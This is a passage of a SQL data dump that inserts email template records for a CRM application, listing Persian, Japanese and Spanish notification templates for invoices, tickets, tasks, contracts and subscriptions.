(1491, 'client', 'client-registration-confirmed', 'persian', 'Customer Registration Confirmed [persian]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1492, 'contract', 'contract-signed-to-staff', 'persian', 'Contract Signed (Sent to Staff) [persian]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1493, 'subscriptions', 'customer-subscribed-to-staff', 'persian', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [persian]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1494, 'client', 'contact-verification-email', 'persian', 'Email Verification (Sent to Contact After Registration) [persian]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1495, 'client', 'new-customer-profile-file-uploaded-to-staff', 'persian', 'New Customer Profile File(s) Uploaded (Sent to Staff) [persian]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1496, 'staff', 'event-notification-to-staff', 'persian', 'Event Notification (Calendar) [persian]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(1497, 'subscriptions', 'subscription-payment-requires-action', 'persian', 'Credit Card Authorization Required - SCA [persian]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1498, 'invoice', 'invoice-due-notice', 'persian', 'Invoice Due Notice [persian]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1499, 'estimate_request', 'estimate-request-submitted-to-staff', 'persian', 'Estimate Request Submitted (Sent to Staff) [persian]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(1500, 'estimate_request', 'estimate-request-assigned', 'persian', 'Estimate Request Assigned (Sent to Staff) [persian]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1501, 'estimate_request', 'estimate-request-received-to-user', 'persian', 'Estimate Request Received (Sent to User) [persian]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1502, 'client', 'new-client-created', 'japanese', 'New Contact Added/Registered (Welcome Email) [japanese]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1503, 'invoice', 'invoice-send-to-client', 'japanese', 'Send Invoice to Customer [japanese]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(1504, 'ticket', 'new-ticket-opened-admin', 'japanese', 'New Ticket Opened (Opened by Staff, Sent to Customer) [japanese]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1505, 'ticket', 'ticket-reply', 'japanese', 'Ticket Reply (Sent to Customer) [japanese]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1506, 'ticket', 'ticket-autoresponse', 'japanese', 'New Ticket Opened - Autoresponse [japanese]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1507, 'invoice', 'invoice-payment-recorded', 'japanese', 'Invoice Payment Recorded (Sent to Customer) [japanese]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(1508, 'invoice', 'invoice-overdue-notice', 'japanese', 'Invoice Overdue Notice [japanese]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1509, 'invoice', 'invoice-already-send', 'japanese', 'Invoice Already Sent to Customer [japanese]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1510, 'ticket', 'new-ticket-created-staff', 'japanese', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [japanese]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(1511, 'estimate', 'estimate-send-to-client', 'japanese', 'Send Estimate to Customer [japanese]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(1512, 'ticket', 'ticket-reply-to-admin', 'japanese', 'Ticket Reply (Sent to Staff) [japanese]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1513, 'estimate', 'estimate-already-send', 'japanese', 'Estimate Already Sent to Customer [japanese]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(1514, 'contract', 'contract-expiration', 'japanese', 'Contract Expiration Reminder (Sent to Customer Contacts) [japanese]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1515, 'tasks', 'task-assigned', 'japanese', 'New Task Assigned (Sent to Staff) [japanese]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1516, 'tasks', 'task-added-as-follower', 'japanese', 'Staff Member Added as Follower on Task (Sent to Staff) [japanese]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1517, 'tasks', 'task-commented', 'japanese', 'New Comment on Task (Sent to Staff) [japanese]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1518, 'tasks', 'task-added-attachment', 'japanese', 'New Attachment(s) on Task (Sent to Staff) [japanese]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1519, 'estimate', 'estimate-declined-to-staff', 'japanese', 'Estimate Declined (Sent to Staff) [japanese]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1520, 'estimate', 'estimate-accepted-to-staff', 'japanese', 'Estimate Accepted (Sent to Staff) [japanese]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1521, 'proposals', 'proposal-client-accepted', 'japanese', 'Customer Action - Accepted (Sent to Staff) [japanese]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1522, 'proposals', 'proposal-send-to-customer', 'japanese', 'Send Proposal to Customer [japanese]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1523, 'proposals', 'proposal-client-declined', 'japanese', 'Customer Action - Declined (Sent to Staff) [japanese]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1524, 'proposals', 'proposal-client-thank-you', 'japanese', 'Thank You Email (Sent to Customer After Accept) [japanese]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1525, 'proposals', 'proposal-comment-to-client', 'japanese', 'New Comment  (Sent to Customer/Lead) [japanese]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1526, 'proposals', 'proposal-comment-to-admin', 'japanese', 'New Comment (Sent to Staff)  [japanese]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1527, 'estimate', 'estimate-thank-you-to-customer', 'japanese', 'Thank You Email (Sent to Customer After Accept) [japanese]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(1528, 'tasks', 'task-deadline-notification', 'japanese', 'Task Deadline Reminder - Sent to Assigned Members [japanese]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1529, 'contract', 'send-contract', 'japanese', 'Send Contract to Customer [japanese]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1530, 'invoice', 'invoice-payment-recorded-to-staff', 'japanese', 'Invoice Payment Recorded (Sent to Staff) [japanese]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(1531, 'ticket', 'auto-close-ticket', 'japanese', 'Auto Close Ticket [japanese]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1532, 'project', 'new-project-discussion-created-to-staff', 'japanese', 'New Project Discussion (Sent to Project Members) [japanese]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1533, 'project', 'new-project-discussion-created-to-customer', 'japanese', 'New Project Discussion (Sent to Customer Contacts) [japanese]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1534, 'project', 'new-project-file-uploaded-to-customer', 'japanese', 'New Project File(s) Uploaded (Sent to Customer Contacts) [japanese]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1535, 'project', 'new-project-file-uploaded-to-staff', 'japanese', 'New Project File(s) Uploaded (Sent to Project Members) [japanese]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1536, 'project', 'new-project-discussion-comment-to-customer', 'japanese', 'New Discussion Comment  (Sent to Customer Contacts) [japanese]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1537, 'project', 'new-project-discussion-comment-to-staff', 'japanese', 'New Discussion Comment (Sent to Project Members) [japanese]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1538, 'project', 'staff-added-as-project-member', 'japanese', 'Staff Added as Project Member [japanese]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1539, 'estimate', 'estimate-expiry-reminder', 'japanese', 'Estimate Expiration Reminder [japanese]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1540, 'proposals', 'proposal-expiry-reminder', 'japanese', 'Proposal Expiration Reminder [japanese]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1541, 'staff', 'new-staff-created', 'japanese', 'New Staff Created (Welcome Email) [japanese]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(1542, 'client', 'contact-forgot-password', 'japanese', 'Forgot Password [japanese]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1543, 'client', 'contact-password-reseted', 'japanese', 'Password Reset - Confirmation [japanese]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1544, 'client', 'contact-set-password', 'japanese', 'Set New Password [japanese]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1545, 'staff', 'staff-forgot-password', 'japanese', 'Forgot Password [japanese]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1546, 'staff', 'staff-password-reseted', 'japanese', 'Password Reset - Confirmation [japanese]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1547, 'project', 'assigned-to-project', 'japanese', 'New Project Created (Sent to Customer Contacts) [japanese]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1548, 'tasks', 'task-added-attachment-to-contacts', 'japanese', 'New Attachment(s) on Task (Sent to Customer Contacts) [japanese]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1549, 'tasks', 'task-commented-to-contacts', 'japanese', 'New Comment on Task (Sent to Customer Contacts) [japanese]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1550, 'leads', 'new-lead-assigned', 'japanese', 'New Lead Assigned to Staff Member [japanese]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(1551, 'client', 'client-statement', 'japanese', 'Statement - Account Summary [japanese]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(1552, 'ticket', 'ticket-assigned-to-admin', 'japanese', 'New Ticket Assigned (Sent to Staff) [japanese]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(1553, 'client', 'new-client-registered-to-admin', 'japanese', 'New Customer Registration (Sent to admins) [japanese]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1554, 'leads', 'new-web-to-lead-form-submitted', 'japanese', 'Web to lead form submitted - Sent to lead [japanese]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1555, 'staff', 'two-factor-authentication', 'japanese', 'Two Factor Authentication [japanese]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1556, 'project', 'project-finished-to-customer', 'japanese', 'Project Marked as Finished (Sent to Customer Contacts) [japanese]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1557, 'credit_note', 'credit-note-send-to-client', 'japanese', 'Send Credit Note To Email [japanese]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1558, 'tasks', 'task-status-change-to-staff', 'japanese', 'Task Status Changed (Sent to Staff) [japanese]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(1559, 'tasks', 'task-status-change-to-contacts', 'japanese', 'Task Status Changed (Sent to Customer Contacts) [japanese]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1560, 'staff', 'reminder-email-staff', 'japanese', 'Staff Reminder Email [japanese]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1561, 'contract', 'contract-comment-to-client', 'japanese', 'New Comment  (Sent to Customer Contacts) [japanese]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1562, 'contract', 'contract-comment-to-admin', 'japanese', 'New Comment (Sent to Staff)  [japanese]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1563, 'subscriptions', 'send-subscription', 'japanese', 'Send Subscription to Customer [japanese]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(1564, 'subscriptions', 'subscription-payment-failed', 'japanese', 'Subscription Payment Failed [japanese]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1565, 'subscriptions', 'subscription-canceled', 'japanese', 'Subscription Canceled (Sent to customer primary contact) [japanese]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1566, 'subscriptions', 'subscription-payment-succeeded', 'japanese', 'Subscription Payment Succeeded (Sent to customer primary contact) [japanese]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1567, 'contract', 'contract-expiration-to-staff', 'japanese', 'Contract Expiration Reminder (Sent to Staff) [japanese]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1568, 'gdpr', 'gdpr-removal-request', 'japanese', 'Removal Request From Contact (Sent to administrators) [japanese]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1569, 'gdpr', 'gdpr-removal-request-lead', 'japanese', 'Removal Request From Lead (Sent to administrators) [japanese]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1570, 'client', 'client-registration-confirmed', 'japanese', 'Customer Registration Confirmed [japanese]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1571, 'contract', 'contract-signed-to-staff', 'japanese', 'Contract Signed (Sent to Staff) [japanese]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1572, 'subscriptions', 'customer-subscribed-to-staff', 'japanese', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [japanese]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1573, 'client', 'contact-verification-email', 'japanese', 'Email Verification (Sent to Contact After Registration) [japanese]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1574, 'client', 'new-customer-profile-file-uploaded-to-staff', 'japanese', 'New Customer Profile File(s) Uploaded (Sent to Staff) [japanese]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1575, 'staff', 'event-notification-to-staff', 'japanese', 'Event Notification (Calendar) [japanese]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(1576, 'subscriptions', 'subscription-payment-requires-action', 'japanese', 'Credit Card Authorization Required - SCA [japanese]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1577, 'invoice', 'invoice-due-notice', 'japanese', 'Invoice Due Notice [japanese]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1578, 'estimate_request', 'estimate-request-submitted-to-staff', 'japanese', 'Estimate Request Submitted (Sent to Staff) [japanese]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(1579, 'estimate_request', 'estimate-request-assigned', 'japanese', 'Estimate Request Assigned (Sent to Staff) [japanese]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1580, 'estimate_request', 'estimate-request-received-to-user', 'japanese', 'Estimate Request Received (Sent to User) [japanese]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1581, 'client', 'new-client-created', 'spanish', 'New Contact Added/Registered (Welcome Email) [spanish]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1582, 'invoice', 'invoice-send-to-client', 'spanish', 'Send Invoice to Customer [spanish]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(1583, 'ticket', 'new-ticket-opened-admin', 'spanish', 'New Ticket Opened (Opened by Staff, Sent to Customer) [spanish]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1584, 'ticket', 'ticket-reply', 'spanish', 'Ticket Reply (Sent to Customer) [spanish]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1585, 'ticket', 'ticket-autoresponse', 'spanish', 'New Ticket Opened - Autoresponse [spanish]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1586, 'invoice', 'invoice-payment-recorded', 'spanish', 'Invoice Payment Recorded (Sent to Customer) [spanish]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(1587, 'invoice', 'invoice-overdue-notice', 'spanish', 'Invoice Overdue Notice [spanish]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1588, 'invoice', 'invoice-already-send', 'spanish', 'Invoice Already Sent to Customer [spanish]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1589, 'ticket', 'new-ticket-created-staff', 'spanish', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [spanish]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(1590, 'estimate', 'estimate-send-to-client', 'spanish', 'Send Estimate to Customer [spanish]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(1591, 'ticket', 'ticket-reply-to-admin', 'spanish', 'Ticket Reply (Sent to Staff) [spanish]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1592, 'estimate', 'estimate-already-send', 'spanish', 'Estimate Already Sent to Customer [spanish]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(1593, 'contract', 'contract-expiration', 'spanish', 'Contract Expiration Reminder (Sent to Customer Contacts) [spanish]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1594, 'tasks', 'task-assigned', 'spanish', 'New Task Assigned (Sent to Staff) [spanish]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1595, 'tasks', 'task-added-as-follower', 'spanish', 'Staff Member Added as Follower on Task (Sent to Staff) [spanish]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1596, 'tasks', 'task-commented', 'spanish', 'New Comment on Task (Sent to Staff) [spanish]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1597, 'tasks', 'task-added-attachment', 'spanish', 'New Attachment(s) on Task (Sent to Staff) [spanish]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1598, 'estimate', 'estimate-declined-to-staff', 'spanish', 'Estimate Declined (Sent to Staff) [spanish]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1599, 'estimate', 'estimate-accepted-to-staff', 'spanish', 'Estimate Accepted (Sent to Staff) [spanish]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1600, 'proposals', 'proposal-client-accepted', 'spanish', 'Customer Action - Accepted (Sent to Staff) [spanish]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1601, 'proposals', 'proposal-send-to-customer', 'spanish', 'Send Proposal to Customer [spanish]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1602, 'proposals', 'proposal-client-declined', 'spanish', 'Customer Action - Declined (Sent to Staff) [spanish]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1603, 'proposals', 'proposal-client-thank-you', 'spanish', 'Thank You Email (Sent to Customer After Accept) [spanish]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1604, 'proposals', 'proposal-comment-to-client', 'spanish', 'New Comment  (Sent to Customer/Lead) [spanish]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1605, 'proposals', 'proposal-comment-to-admin', 'spanish', 'New Comment (Sent to Staff)  [spanish]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1606, 'estimate', 'estimate-thank-you-to-customer', 'spanish', 'Thank You Email (Sent to Customer After Accept) [spanish]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(1607, 'tasks', 'task-deadline-notification', 'spanish', 'Task Deadline Reminder - Sent to Assigned Members [spanish]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1608, 'contract', 'send-contract', 'spanish', 'Send Contract to Customer [spanish]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1609, 'invoice', 'invoice-payment-recorded-to-staff', 'spanish', 'Invoice Payment Recorded (Sent to Staff) [spanish]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(1610, 'ticket', 'auto-close-ticket', 'spanish', 'Auto Close Ticket [spanish]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1611, 'project', 'new-project-discussion-created-to-staff', 'spanish', 'New Project Discussion (Sent to Project Members) [spanish]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1612, 'project', 'new-project-discussion-created-to-customer', 'spanish', 'New Project Discussion (Sent to Customer Contacts) [spanish]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1613, 'project', 'new-project-file-uploaded-to-customer', 'spanish', 'New Project File(s) Uploaded (Sent to Customer Contacts) [spanish]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1614, 'project', 'new-project-file-uploaded-to-staff', 'spanish', 'New Project File(s) Uploaded (Sent to Project Members) [spanish]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1615, 'project', 'new-project-discussion-comment-to-customer', 'spanish', 'New Discussion Comment  (Sent to Customer Contacts) [spanish]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1616, 'project', 'new-project-discussion-comment-to-staff', 'spanish', 'New Discussion Comment (Sent to Project Members) [spanish]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1617, 'project', 'staff-added-as-project-member', 'spanish', 'Staff Added as Project Member [spanish]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1618, 'estimate', 'estimate-expiry-reminder', 'spanish', 'Estimate Expiration Reminder [spanish]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1619, 'proposals', 'proposal-expiry-reminder', 'spanish', 'Proposal Expiration Reminder [spanish]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1620, 'staff', 'new-staff-created', 'spanish', 'New Staff Created (Welcome Email) [spanish]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(1621, 'client', 'contact-forgot-password', 'spanish', 'Forgot Password [spanish]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1622, 'client', 'contact-password-reseted', 'spanish', 'Password Reset - Confirmation [spanish]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1623, 'client', 'contact-set-password', 'spanish', 'Set New Password [spanish]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1624, 'staff', 'staff-forgot-password', 'spanish', 'Forgot Password [spanish]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1625, 'staff', 'staff-password-reseted', 'spanish', 'Password Reset - Confirmation [spanish]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1626, 'project', 'assigned-to-project', 'spanish', 'New Project Created (Sent to Customer Contacts) [spanish]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1627, 'tasks', 'task-added-attachment-to-contacts', 'spanish', 'New Attachment(s) on Task (Sent to Customer Contacts) [spanish]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1628, 'tasks', 'task-commented-to-contacts', 'spanish', 'New Comment on Task (Sent to Customer Contacts) [spanish]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1629, 'leads', 'new-lead-assigned', 'spanish', 'New Lead Assigned to Staff Member [spanish]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(1630, 'client', 'client-statement', 'spanish', 'Statement - Account Summary [spanish]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(1631, 'ticket', 'ticket-assigned-to-admin', 'spanish', 'New Ticket Assigned (Sent to Staff) [spanish]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0);
INSERT INTO `tblemailtemplates` (`emailtemplateid`, `type`, `slug`, `language`, `name`, `subject`, `message`, `fromname`, `fromemail`, `plaintext`, `active`, `order`) VALUES
(1632, 'client', 'new-client-registered-to-admin', 'spanish', 'New Customer Registration (Sent to admins) [spanish]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1633, 'leads', 'new-web-to-lead-form-submitted', 'spanish', 'Web to lead form submitted - Sent to lead [spanish]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1634, 'staff', 'two-factor-authentication', 'spanish', 'Two Factor Authentication [spanish]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1635, 'project', 'project-finished-to-customer', 'spanish', 'Project Marked as Finished (Sent to Customer Contacts) [spanish]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1636, 'credit_note', 'credit-note-send-to-client', 'spanish', 'Send Credit Note To Email [spanish]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1637, 'tasks', 'task-status-change-to-staff', 'spanish', 'Task Status Changed (Sent to Staff) [spanish]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(1638, 'tasks', 'task-status-change-to-contacts', 'spanish', 'Task Status Changed (Sent to Customer Contacts) [spanish]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1639, 'staff', 'reminder-email-staff', 'spanish', 'Staff Reminder Email [spanish]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1640, 'contract', 'contract-comment-to-client', 'spanish', 'New Comment  (Sent to Customer Contacts) [spanish]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1641, 'contract', 'contract-comment-to-admin', 'spanish', 'New Comment (Sent to Staff)  [spanish]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1642, 'subscriptions', 'send-subscription', 'spanish', 'Send Subscription to Customer [spanish]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(1643, 'subscriptions', 'subscription-payment-failed', 'spanish', 'Subscription Payment Failed [spanish]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1644, 'subscriptions', 'subscription-canceled', 'spanish', 'Subscription Canceled (Sent to customer primary contact) [spanish]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1645, 'subscriptions', 'subscription-payment-succeeded', 'spanish', 'Subscription Payment Succeeded (Sent to customer primary contact) [spanish]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1646, 'contract', 'contract-expiration-to-staff', 'spanish', 'Contract Expiration Reminder (Sent to Staff) [spanish]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1647, 'gdpr', 'gdpr-removal-request', 'spanish', 'Removal Request From Contact (Sent to administrators) [spanish]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1648, 'gdpr', 'gdpr-removal-request-lead', 'spanish', 'Removal Request From Lead (Sent to administrators) [spanish]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1649, 'client', 'client-registration-confirmed', 'spanish', 'Customer Registration Confirmed [spanish]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1650, 'contract', 'contract-signed-to-staff', 'spanish', 'Contract Signed (Sent to Staff) [spanish]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
